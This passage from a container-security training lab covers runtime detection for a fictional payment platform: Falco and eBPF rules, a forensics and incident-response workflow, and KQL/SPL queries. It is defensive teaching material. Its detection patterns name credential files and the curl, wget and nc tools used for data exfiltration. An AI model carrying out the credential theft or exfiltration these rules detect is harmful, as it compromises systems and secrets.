     image=%container.image.repository namespace=%k8s.ns.name
     pod=%k8s.pod.name cpu_usage=%proc.pcpu)
  priority: CRITICAL
  tags: [container, cryptomining, T1496]

# Rule: Detect sensitive file access patterns
- rule: Sensitive File Read in Container
  desc: Detect access to sensitive files that may indicate credential harvesting
  condition: >
    open_read and
    container and
    (fd.name in ("/etc/shadow", "/etc/passwd", "/etc/kubernetes/admin.conf",
                  "/root/.kube/config", "/root/.aws/credentials",
                  "/root/.ssh/id_rsa", "/root/.ssh/id_ed25519") or
     fd.name startswith "/var/run/secrets/")
  output: >
    Sensitive file accessed in container
    (user=%user.name file=%fd.name command=%proc.cmdline
     container=%container.name namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, credential_access, T1552]

# Rule: Detect unexpected network listeners
- rule: Unexpected Network Listener in Container
  desc: Detect a process binding to a port not defined in the pod spec
  condition: >
    evt.type in (bind, listen) and
    container and
    fd.sport != 8080 and
    fd.sport != 9090 and
    fd.sport != 15090 and
    fd.sport > 1024
  output: >
    Unexpected network listener in container
    (process=%proc.name port=%fd.sport command=%proc.cmdline
     container=%container.name namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, persistence, backdoor, T1205]

# Rule: Detect kubectl or curl to Kubernetes API from container
- rule: Kubernetes API Access from Container
  desc: Detect direct access to the Kubernetes API server from within a container
  condition: >
    container and
    ((evt.type in (connect, sendto)) and
     (fd.sip = "10.96.0.1" or fd.sip = "203.0.113.10") and
     fd.sport = 443)
  output: >
    Kubernetes API accessed from container
    (process=%proc.name command=%proc.cmdline dest=%fd.sip:%fd.sport
     container=%container.name namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, discovery, kubernetes_api, T1613]

# Rule: Detect package manager execution in production container
- rule: Package Manager in Production Container
  desc: Detect apt, yum, apk, or pip being run inside a production container
  condition: >
    spawned_process and
    container and
    proc.name in ("apt", "apt-get", "yum", "dnf", "apk", "pip", "pip3",
                   "npm", "gem", "cargo") and
    k8s.ns.name = "cloudpay-prod"
  output: >
    Package manager executed in production container — possible tampering
    (process=%proc.name command=%proc.cmdline container=%container.name
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, execution, supply_chain, T1195]

# Rule: Detect binary written to tmp or writable directory
- rule: Binary Written to Container
  desc: Detect a new binary or script being written to a container
  condition: >
    open_write and
    container and
    (fd.name startswith "/tmp/" or
     fd.name startswith "/dev/shm/" or
     fd.name startswith "/var/tmp/") and
    (fd.name endswith ".sh" or
     fd.name endswith ".py" or
     fd.name endswith ".so" or
     fd.name endswith ".elf" or
     evt.rawarg.flags contains "O_EXEC")
  output: >
    Executable file written in container
    (user=%user.name file=%fd.name command=%proc.cmdline
     container=%container.name namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: HIGH
  tags: [container, execution, dropper, T1105]

Step 5.2: eBPF-Based Container Monitoring

eBPF (extended Berkeley Packet Filter) provides deep kernel-level visibility without requiring kernel modules. Tools like Tetragon and Cilium Hubble leverage eBPF for security monitoring.

# Install Cilium Tetragon for eBPF-based security observability (SYNTHETIC)
$ helm install tetragon cilium/tetragon -n kube-system

# Define a TracingPolicy for file access monitoring
$ cat <<EOF | kubectl apply -f -
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: file-access-monitoring
spec:
  kprobes:
  - call: "security_file_open"
    syscall: false
    args:
    - index: 0
      type: "file"
    selectors:
    - matchArgs:
      - index: 0
        operator: "Prefix"
        values:
        - "/etc/shadow"
        - "/etc/passwd"
        - "/var/run/secrets"
        - "/root/.ssh"
        - "/root/.aws"
        - "/root/.kube"
    - matchNamespaces:
      - namespace: "cloudpay-prod"
        operator: "In"
EOF

# Define a TracingPolicy for network connection monitoring
$ cat <<EOF | kubectl apply -f -
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: network-connection-monitoring
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchArgs:
      - index: 0
        operator: "DAddr"
        values:
        - "169.254.169.254"   # Cloud metadata
    - matchActions:
      - action: "Sigkill"     # Kill the process immediately
EOF

# View Tetragon events (SYNTHETIC)
$ kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout | \
    jq 'select(.process_kprobe != null) | {
      time: .time,
      pod: .process_kprobe.process.pod.name,
      namespace: .process_kprobe.process.pod.namespace,
      binary: .process_kprobe.process.binary,
      arguments: .process_kprobe.process.arguments,
      function: .process_kprobe.function_name
    }'

{
  "time": "2026-03-24T11:30:45.123Z",
  "pod": "payment-gateway-7d8f9b6c4-abc12",
  "namespace": "cloudpay-prod",
  "binary": "/usr/local/bin/python3",
  "arguments": "/app/src/app.py",
  "function": "security_file_open"
}

Step 5.3: Container Forensics Workflow

When a container security incident occurs, follow this forensics workflow:

# ============================================================
# Container Forensics Workflow (SYNTHETIC)
# ============================================================

# Step 1: Identify the compromised pod
$ kubectl get pods -n cloudpay-prod -o wide
NAME                                  READY   STATUS    IP            NODE
payment-gateway-7d8f9b6c4-abc12      2/2     Running   10.244.1.15   10.50.1.10

# Step 2: Capture pod details BEFORE taking action
$ kubectl describe pod payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod > \
    /tmp/forensics/pod-describe.txt

$ kubectl get pod payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod -o yaml > \
    /tmp/forensics/pod-spec.yaml

# Step 3: Capture container logs
$ kubectl logs payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod \
    --all-containers --timestamps > /tmp/forensics/pod-logs.txt

# Previous container logs (if restarted)
$ kubectl logs payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod \
    --previous --timestamps > /tmp/forensics/pod-logs-previous.txt 2>/dev/null

# Step 4: Capture running processes inside the container
$ kubectl exec payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod -- ps auxww > \
    /tmp/forensics/processes.txt

# Step 5: Capture network connections
$ kubectl exec payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod -- \
    cat /proc/net/tcp > /tmp/forensics/network-tcp.txt
$ kubectl exec payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod -- \
    cat /proc/net/tcp6 > /tmp/forensics/network-tcp6.txt

# Step 6: Capture filesystem state
$ kubectl exec payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod -- \
    find / -newer /app/src/app.py -type f 2>/dev/null > /tmp/forensics/modified-files.txt

# Step 7: Check for unusual environment variables
$ kubectl exec payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod -- env | sort > \
    /tmp/forensics/environment.txt

# Step 8: Copy container filesystem for offline analysis
$ kubectl cp cloudpay-prod/payment-gateway-7d8f9b6c4-abc12:/tmp /tmp/forensics/container-tmp/

# Step 9: Snapshot the container image layers for diff analysis
# Get the container ID from the node
$ CONTAINER_ID=$(kubectl get pod payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod \
    -o jsonpath='{.status.containerStatuses[0].containerID}' | cut -d'/' -f3)

# On the node: create a snapshot (SYNTHETIC)
$ docker diff $CONTAINER_ID > /tmp/forensics/container-diff.txt

# Example output:
# C /tmp
# A /tmp/suspicious-script.sh
# A /tmp/data-exfil.tar.gz
# C /etc/hosts
# A /dev/shm/payload.so

# Step 10: Isolate the pod — apply network quarantine
$ cat <<EOF | kubectl apply -f -
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: quarantine-compromised-pod
  namespace: cloudpay-prod
spec:
  podSelector:
    matchLabels:
      app: payment-gateway
      quarantine: "true"
  policyTypes:
  - Ingress
  - Egress
  # Empty rules = deny all traffic
EOF

# Label the pod for quarantine
$ kubectl label pod payment-gateway-7d8f9b6c4-abc12 -n cloudpay-prod quarantine=true

# Step 11: Preserve evidence — do NOT delete the pod yet
# Scale up a clean replacement
$ kubectl scale deployment payment-gateway -n cloudpay-prod --replicas=4
# The new pod will be scheduled; the quarantined pod remains for analysis

Step 5.4: Log Aggregation with Fluentd

# Fluentd DaemonSet configuration for container log collection (SYNTHETIC)
apiVersion: v1
kind: ConfigMap
metadata:
  name: fluentd-config
  namespace: monitoring
data:
  fluent.conf: |
    # Collect container logs
    <source>
      @type tail
      path /var/log/containers/*.log
      pos_file /var/log/fluentd-containers.log.pos
      tag kubernetes.*
      read_from_head true
      <parse>
        @type json
        time_key time
        time_format %Y-%m-%dT%H:%M:%S.%NZ
      </parse>
    </source>

    # Collect Falco alerts
    <source>
      @type tail
      path /var/log/falco/falco_events.log
      pos_file /var/log/fluentd-falco.log.pos
      tag falco.*
      <parse>
        @type json
      </parse>
    </source>

    # Collect Kubernetes audit logs
    <source>
      @type tail
      path /var/log/kubernetes/audit/kube-apiserver-audit.log
      pos_file /var/log/fluentd-kube-audit.log.pos
      tag kube.audit.*
      <parse>
        @type json
      </parse>
    </source>

    # Enrich logs with Kubernetes metadata
    <filter kubernetes.**>
      @type kubernetes_metadata
      @id filter_kube_metadata
    </filter>

    # Tag security-relevant events
    <filter kubernetes.**>
      @type grep
      <regexp>
        key log
        pattern /(error|warn|critical|security|unauthorized|forbidden|denied|escape|privilege|suspicious)/i
      </regexp>
    </filter>

    # Output to SIEM (SYNTHETIC — Elasticsearch/Splunk/Sentinel)
    <match **>
      @type elasticsearch
      host elasticsearch.monitoring.svc.cluster.local
      port 9200
      index_name k8s-security-logs
      type_name _doc
      logstash_format true
      logstash_prefix k8s-security
      <buffer>
        @type file
        path /var/log/fluentd-buffers/kubernetes.security.buffer
        flush_mode interval
        flush_interval 5s
        chunk_limit_size 2M
        queue_limit_length 32
        retry_max_interval 30
        retry_forever true
      </buffer>
    </match>

Step 5.5: Incident Response Playbook — Container Compromise

┌──────────────────────────────────────────────────────────────────┐
│           Container Compromise IR Playbook (SYNTHETIC)           │
├──────────────────────────────────────────────────────────────────┤
│                                                                  │
│  1. DETECT                                                       │
│     ├─ Falco alert triggered (Critical/High priority)            │
│     ├─ SIEM correlation rule matched                             │
│     ├─ Anomalous process/network activity detected               │
│     └─ Container image vulnerability scan flagged active CVE     │
│                                                                  │
│  2. TRIAGE (< 15 minutes)                                       │
│     ├─ Confirm alert is not false positive                       │
│     ├─ Identify affected pod, namespace, node, image             │
│     ├─ Determine blast radius (what can this pod access?)        │
│     └─ Assign severity: P1 (escape confirmed), P2 (suspicious), │
│        P3 (policy violation)                                     │
│                                                                  │
│  3. CONTAIN (< 30 minutes)                                      │
│     ├─ Apply quarantine NetworkPolicy (deny all ingress/egress)  │
│     ├─ Label pod with quarantine=true                            │
│     ├─ DO NOT delete the pod (preserve evidence)                 │
│     ├─ Scale deployment to replace the compromised replica       │
│     ├─ Rotate any credentials the pod had access to:             │
│     │   ├─ Kubernetes service account tokens                     │
│     │   ├─ Database credentials                                  │
│     │   ├─ API keys and secrets                                  │
│     │   └─ Cloud IAM credentials (if IRSA/Workload Identity)     │
│     └─ Block the compromised image in admission controller       │
│                                                                  │
│  4. INVESTIGATE (< 2 hours)                                     │
│     ├─ Collect forensic artifacts (Step 5.3 workflow)            │
│     ├─ Analyze container diff for added/modified files           │
│     ├─ Review network flow logs for lateral movement             │
│     ├─ Check audit logs for RBAC abuse or API calls              │
│     ├─ Examine Falco timeline for sequence of events             │
│     ├─ Determine initial access vector:                          │
│     │   ├─ Vulnerable application code (RCE, SSRF)              │
│     │   ├─ Supply chain compromise (malicious image/dependency)  │
│     │   ├─ Exposed Kubernetes API or dashboard                   │
│     │   └─ Stolen credentials (service account token)            │
│     └─ Map findings to MITRE ATT&CK Containers matrix           │
│                                                                  │
│  5. ERADICATE                                                    │
│     ├─ Patch the vulnerable image and push to registry           │
│     ├─ Update NetworkPolicies to prevent recurrence              │
│     ├─ Add/update Falco rules for new IOCs                       │
│     ├─ Update admission controller policies                     │
│     └─ Redeploy clean workloads with hardened configuration      │
│                                                                  │
│  6. RECOVER                                                      │
│     ├─ Verify new deployment is healthy and secure               │
│     ├─ Confirm all rotated credentials are working               │
│     ├─ Monitor closely for 72 hours post-recovery                │
│     └─ Remove quarantine NetworkPolicy after evidence preserved  │
│                                                                  │
│  7. POST-INCIDENT                                                │
│     ├─ Write incident report with timeline                       │
│     ├─ Update runbooks and detection rules                       │
│     ├─ Conduct blameless retrospective                           │
│     ├─ Update security controls and policies                     │
│     └─ Share anonymized IOCs with threat intel community         │
│                                                                  │
└──────────────────────────────────────────────────────────────────┘

Step 5.6: Automated Response with Falco Sidekick

# Falco Sidekick configuration for automated response (SYNTHETIC)
# falcosidekick-config.yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: falcosidekick-config
  namespace: monitoring
data:
  config.yaml: |
    # Slack notifications for all priorities
    slack:
      webhookurl: "https://hooks.slack.example.com/services/REDACTED"
      channel: "#security-alerts"
      minimumpriority: "warning"
      messageformat: |
        *Priority:* {{ .Priority }}
        *Rule:* {{ .Rule }}
        *Output:* {{ .Output }}
        *Namespace:* {{ index .OutputFields "k8s.ns.name" }}
        *Pod:* {{ index .OutputFields "k8s.pod.name" }}
        *Container:* {{ index .OutputFields "container.name" }}
        *Image:* {{ index .OutputFields "container.image.repository" }}

    # PagerDuty for critical alerts
    pagerduty:
      routingkey: "REDACTED"
      minimumpriority: "critical"

    # Kubernetes response — label pods on critical alert
    kubernetesclient:
      enabled: true
      kubeconfig: ""  # Uses in-cluster config
      namespace: ""
      # On critical Falco alert: label the pod for quarantine
      labelsadd:
        - key: "security.novstar.example.com/alert"
          value: "critical"
        - key: "quarantine"
          value: "true"
      minimumpriority: "critical"

Step 5.7: Security Monitoring Dashboard Metrics

Key metrics to track in Grafana for container security:

# Prometheus recording rules for container security metrics (SYNTHETIC)
apiVersion: monitoring.coreos.com/v1
kind: PrometheusRule
metadata:
  name: container-security-rules
  namespace: monitoring
spec:
  groups:
  - name: container-security
    interval: 30s
    rules:
    # Count of containers running as root
    - record: container_security:root_containers:count
      expr: |
        count(
          kube_pod_container_info{namespace="cloudpay-prod"}
          * on(pod, namespace) group_left()
          (kube_pod_security_context{run_as_user="0"} or
           kube_pod_security_context{run_as_non_root="false"})
        ) or vector(0)

    # Count of privileged containers
    - record: container_security:privileged_containers:count
      expr: |
        count(
          kube_pod_container_info{namespace="cloudpay-prod"}
          * on(pod, namespace) group_left()
          kube_pod_security_context{privileged="true"}
        ) or vector(0)

    # Count of pods without resource limits
    - record: container_security:no_limits:count
      expr: |
        count(
          kube_pod_container_info{namespace="cloudpay-prod"}
          unless on(pod, namespace, container)
          kube_pod_container_resource_limits{resource="cpu"}
        ) or vector(0)

    # Falco critical alerts per hour
    - record: container_security:falco_critical:rate1h
      expr: |
        sum(rate(falco_events_total{priority="Critical"}[1h])) or vector(0)

    # Image vulnerabilities by severity
    - record: container_security:image_vulns:total
      expr: |
        sum by (severity) (
          trivy_vulnerability_count{namespace="cloudpay-prod"}
        )

Detection Queries — Runtime Security

KQL — Comprehensive runtime detection:

// KQL: Detect cryptocurrency mining indicators in containers
ContainerLog
| where TimeGenerated > ago(1h)
| where LogEntry has_any ("stratum+tcp", "xmrig", "mining",
                           "hashrate", "coin", "pool.minergate",
                           "cryptonight", "randomx")
| project TimeGenerated, ContainerID, Image, Name, LogEntry
| summarize Count=count(), Examples=take_any(LogEntry, 3) by Image, Name
| sort by Count desc

// KQL: Detect data exfiltration from containers
ContainerLog
| where TimeGenerated > ago(4h)
| where LogEntry has_any ("curl", "wget", "nc ", "ncat")
| where LogEntry has_any ("POST", "PUT", "upload", "--data", "-d ")
| where LogEntry !has "healthz" and LogEntry !has "readyz"
| project TimeGenerated, ContainerID, Image, Name, LogEntry
| sort by TimeGenerated desc

// KQL: Container restart anomaly detection
KubePodInventory
| where TimeGenerated > ago(24h)
| where Namespace == "cloudpay-prod"
| summarize RestartCount = max(ContainerRestartCount) by Name, ContainerName, Image
| where RestartCount > 5
| sort by RestartCount desc

// KQL: Detect Kubernetes API access patterns from pods
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| extend UserAgent = tostring(AuditLog.userAgent)
| extend SourceIP = tostring(AuditLog.sourceIPs[0])
| extend Verb = tostring(AuditLog.verb)
| extend Resource = tostring(AuditLog.objectRef.resource)
| where UserAgent !has "kube-proxy" and UserAgent !has "kubelet"
| where SourceIP startswith "10.244."   // Pod network
| summarize Count=count() by SourceIP, Verb, Resource, UserAgent
| where Count > 10
| sort by Count desc

SPL — Runtime security monitoring:

// SPL: Detect anomalous processes in containers
index=kubernetes sourcetype="falco"
| where priority IN ("Critical", "Error", "Warning")
| stats count by rule, priority, container_name, k8s_ns_name, k8s_pod_name
| sort -count
| head 50

// SPL: Detect file integrity violations in containers
index=kubernetes sourcetype="falco"
| where rule IN ("Binary Written to Container",
                  "Sensitive File Read in Container",
                  "Package Manager in Production Container")
| table _time, rule, priority, container_name, k8s_ns_name,
        k8s_pod_name, proc_cmdline, fd_name
| sort -_time

// SPL: Container security posture summary
index=kubernetes sourcetype="kube:objects:pods"
| spath "spec.containers{}.securityContext.privileged"
| spath "spec.containers{}.securityContext.runAsNonRoot"
| spath "spec.containers{}.securityContext.readOnlyRootFilesystem"
| eval privileged=if('spec.containers{}.securityContext.privileged'="true", 1, 0)
| eval nonroot=if('spec.containers{}.securityContext.runAsNonRoot'="true", 1, 0)
| eval readonly_fs=if('spec.containers{}.securityContext.readOnlyRootFilesystem'="true", 1, 0)
| stats sum(privileged) as PrivilegedContainers,
        sum(nonroot) as NonRootContainers,
        sum(readonly_fs) as ReadOnlyFSContainers,
        dc(pod_name) as TotalPods
        by namespace
| eval ComplianceScore = round((NonRootContainers + ReadOnlyFSContainers) / (TotalPods * 2) * 100, 1)
| sort -ComplianceScore

// SPL: Detect lateral movement attempts between containers
index=kubernetes sourcetype="calico:flowlogs"
| where action="allow" AND src_namespace="cloudpay-prod" AND dest_namespace="cloudpay-prod"
| stats count as connection_count, dc(dest_pod) as unique_destinations by src_pod
| where unique_destinations > 5
| sort -unique_destinations
| rename src_pod as "Source Pod", unique_destinations as "Destinations Contacted",
         connection_count as "Total Connections"

Key Takeaways — Exercise 5

Runtime Security Principles

  1. Runtime detection is the last line of defense — Prevention fails; runtime monitoring with Falco/eBPF detects what gets past admission controllers and network policies
  2. eBPF provides kernel-level visibility — Tetragon and Cilium Hubble observe syscalls, file access, and network connections without container modification
  3. Forensics before remediation — Always capture evidence (pod spec, logs, filesystem diff, network state) before deleting compromised containers
  4. Automate response — Falco Sidekick can automatically quarantine pods, alert teams, and trigger incident workflows
  5. Log everything centrally — Container logs, Kubernetes audit logs, Falco alerts, and network flow logs must all aggregate to SIEM for correlation
  6. Monitor security posture continuously — Track metrics like root containers, missing resource limits, image vulnerabilities, and Falco alert rates in dashboards

Lab Summary

What You Accomplished

In this lab, you performed a comprehensive container security assessment of the CloudPay payment processing platform:

Exercise Focus Area Key Outcome
1 Image Security Reduced vulnerabilities by 95.5% via multi-stage builds, distroless images, and scanning
2 Pod Security Enforced Restricted Pod Security Standards with SecurityContext, RBAC, and OPA Gatekeeper
3 Container Escape Simulated and detected Docker socket, privileged, and cgroup escape techniques
4 Network Policies Implemented default-deny segmentation with Kubernetes NetworkPolicy, Calico, and Istio mTLS
5 Runtime Security Deployed Falco rules, eBPF monitoring, and container forensics workflows

MITRE ATT&CK Mapping

Technique ID Technique Name Exercise Detection
T1611 Escape to Host Ex. 3 Falco rules, KQL, SPL
T1610 Deploy Container Ex. 2, 3 Kubernetes audit logs
T1613 Container and Resource Discovery Ex. 5 Falco, eBPF
T1552 Unsecured Credentials Ex. 1, 5 Image scanning, Falco
T1528 Steal Application Access Token Ex. 3 Falco SA token rule
T1496 Resource Hijacking (Cryptomining) Ex. 5 Falco, process monitoring
T1059 Command and Scripting Interpreter Ex. 3 Reverse shell detection
T1105 Ingress Tool Transfer Ex. 5 Binary write detection
T1195 Supply Chain Compromise Ex. 1, 5 Image scanning, package manager detection
T1205 Traffic Signaling (Backdoor) Ex. 5 Unexpected listener detection

Security Controls Implemented

Category Before After
Image Vulnerabilities 265 (13 Critical) 12 (0 Critical)
Image Size 1.2 GB 89 MB
Pod Security Standard None Restricted
Runs as Root Yes No
Privileged Containers Allowed Blocked by admission controller
Docker Socket Mounted Yes Blocked by admission controller
Network Segmentation None (allow-all) Default-deny + explicit allow
mTLS None Strict (Istio)
Cloud Metadata Access Allowed Blocked (Calico GlobalNetworkPolicy)
Runtime Detection None Falco + eBPF (Tetragon)
Log Aggregation None Fluentd to SIEM
Automated Response None Falco Sidekick auto-quarantine

Additional Resources

Cross-References

External Resources

CWE References

CWE Name Exercise
CWE-250 Execution with Unnecessary Privileges Ex. 1, 2
CWE-269 Improper Privilege Management Ex. 2, 3
CWE-284 Improper Access Control Ex. 2, 4
CWE-311 Missing Encryption of Sensitive Data Ex. 4
CWE-522 Insufficiently Protected Credentials Ex. 1
CWE-668 Exposure of Resource to Wrong Sphere Ex. 3
CWE-732 Incorrect Permission Assignment Ex. 2
CWE-778 Insufficient Logging Ex. 5
CWE-1188 Insecure Default Initialization of Resource Ex. 2, 4

Advance Your Career

Recommended Certifications

This lab covers objectives tested in the following certifications. Investing in these credentials validates your container and cloud security expertise:

Certification Focus Link
CKS — Certified Kubernetes Security Specialist Kubernetes cluster hardening, supply chain security, runtime monitoring, network policies Learn More
CKAD — Certified Kubernetes Application Developer Kubernetes application design, pod configuration, observability Learn More
CompTIA Cloud+ (CV0-004) Cloud security, deployment, operations, troubleshooting across multi-cloud Learn More
AWS Certified Security — Specialty AWS security services, identity management, infrastructure protection, incident response Learn More
CCSP — Certified Cloud Security Professional Cloud architecture, data security, platform security, compliance Learn More

These links are provided for reference. Nexus SecOps may earn a commission from qualifying purchases, which helps support free security education content.